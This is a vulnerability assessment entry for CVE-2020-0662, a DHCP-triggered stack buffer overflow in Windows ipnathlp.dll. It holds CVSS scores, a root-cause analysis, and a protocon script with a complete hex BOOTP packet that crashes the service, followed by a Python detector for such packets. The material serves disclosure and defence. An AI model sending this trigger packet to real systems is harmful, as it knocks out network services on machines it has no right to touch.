8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
A remote code execution vulnerability exists in the way that Windows handles objects in memory, aka ‘Windows Remote Code Execution Vulnerability’.
Recent assessments:
zeroSteiner at March 17, 2020 8:31pm UTC reported:
Analysis performed using ipnathlp.dll from Windows Server 2019 x64 (sha256: c5bfdd192eaac8ffa8c0ee9c5fbb719eb739518a0635dc5cba42f52ab7efefa9)
CVE-2020-0662 is a stack-based buffer overflow occurring in svchost.exe due to an unchecked size argument to a memcpy call in ipnathlp.dll!DhcpAddArpEntry. The size argument is restricted to 0-255 inclusive as it must fit in a uint8_t variable. The size argument for the affected memcpy call is taken from the “Hardware address length” field from a DHCP/BootP message.
In order to hit the vulnerable code path and trigger the bug, the size (hardware address length) field must be sufficiently large, and the DHCP option 53 / 0x34 (DHCP Message Type) must be omitted.
The following protocon script can be used to trigger the crash:
# Dynamic Host Configuration Protocol
# Message type: Boot Request (1)
# Hardware type: Ethernet (0x01)
# Hardware address length: 255
# Hops: 0
# Transaction ID: 0x5df26992
# Seconds elapsed: 1
# Bootp flags: 0x0000 (Unicast)
# Client IP address: 0.0.0.0
# Your (client) IP address: 0.0.0.0
# Next server IP address: 0.0.0.0
# Relay agent IP address: 0.0.0.0
# Client MAC address: Vmware_84:05:fd (00:0c:29:84:05:fd)
# Client hardware address padding: 00000000000000000000
# Server host name not given
# Boot file name not given
# Magic cookie: DHCP
# Option: (255) End
# Option End: 255
set encoding hex
send 0101ff005df269920001000000000000000000000000000000000000000c298405fd0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363ff
exit
On a Windows Server 2019 installation, this process is protected by stack cookies, making exploitation non-trivial. The cookie value would need to be leaked, and the service which hosts the DLL is not configured to automatically start. To make a system vulnerable, an interface must be marked as “Shared”. To do this:
1. Open the power user menu with Win+X and select “Network Connections”
2. From the Network Connections window, select “Change adapter options”
3. Right click an adapter which has an internet connection and select “Properties”
4. Navigate to the “Sharing” tab and check “Allow other network users to connect through this computer’s Internet connection”
5. Click “OK”
ipnathlp!DhcpProcessMessage
  ipnathlp!DhcpProcessBootpMessage
    * Only invoked if the DHCP Message Type option is omitted
    ipnathlp!DhcpAddArpEntry
      * Second `memcpy` call is the vulnerability, the size argument is under attacker control
The target process uses stack canaries, so overwriting the stack would require a leak. The original structure is a MIB_IPNET_ROW2 instance. Of note here is that the PhysicalAddressLength field is located after the PhysicalAddress field and is set before the memcpy call. This could allow an attacker to overwrite this field. Immediately following this operation, the row is passed to iphlpapi!CreateIpNetEntry2 where the PhysicalAddressLength field is subjected to proper boundary checking (<= 0x20).
Windows 7 does not appear to be a viable exploit target because the affected memcpy call is not present due to an older API being used. There is a memcmp instruction to which the size parameter can be controlled, but this would result in an OOB read which is much less useful.
Assessed Attacker Value: 3
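The two trigger conditions named in the assessment (an oversized “Hardware address length” and a missing DHCP Message Type option) can be checked directly on captured BOOTP/DHCP payloads. The following detector is an added example, not code from the assessment or from Microsoft; the BOOTP layout is the standard one, and the sample packets are constructed inline with an arbitrary transaction ID.

```python
import struct

BOOTP_FIXED_LEN = 236            # op through file, before the magic cookie
DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_PAD, OPT_END, OPT_MSG_TYPE = 0, 255, 53
MAX_SANE_HLEN = 16               # the chaddr field is only 16 bytes wide

def parse_dhcp_options(data):
    """Return {code: value} for the option area that follows the magic cookie."""
    opts, i = {}, 0
    while i < len(data):
        code = data[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END or i + 1 >= len(data):
            break
        length = data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def check_bootp(pkt):
    """Return findings for one BOOTP/DHCP payload (UDP data, no IP/UDP headers)."""
    findings = []
    if len(pkt) < BOOTP_FIXED_LEN:
        return ["truncated BOOTP header"]
    op, _htype, hlen = struct.unpack_from("!BBB", pkt, 0)
    if hlen > MAX_SANE_HLEN:
        findings.append(f"hlen={hlen} exceeds the 16-byte chaddr field")
    opts = {}
    if pkt[BOOTP_FIXED_LEN:BOOTP_FIXED_LEN + 4] == DHCP_MAGIC:
        opts = parse_dhcp_options(pkt[BOOTP_FIXED_LEN + 4:])
    if OPT_MSG_TYPE not in opts:
        findings.append("no DHCP Message Type (option 53): handled as plain BOOTP")
    if op == 1 and hlen > MAX_SANE_HLEN and OPT_MSG_TYPE not in opts:
        findings.append("matches CVE-2020-0662 trigger conditions")
    return findings

def build_bootp(hlen, options):
    """Constructed sample: a minimal BOOTREQUEST with the given hlen and raw option bytes."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 1, 1, hlen, 0, 0x11223344, 0, 0,
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                         b"\0" * 16, b"\0" * 64, b"\0" * 128)
    return header + DHCP_MAGIC + options + bytes([OPT_END])

NORMAL_DISCOVER = build_bootp(6, bytes([OPT_MSG_TYPE, 1, 1]))  # hlen 6, DHCPDISCOVER
SUSPICIOUS = build_bootp(255, b"")                             # hlen 255, no option 53
```

Feed the UDP payload of each port 67 datagram to check_bootp; a clean DHCP message yields no findings, while a message that is oversized and lacks option 53 reports all three.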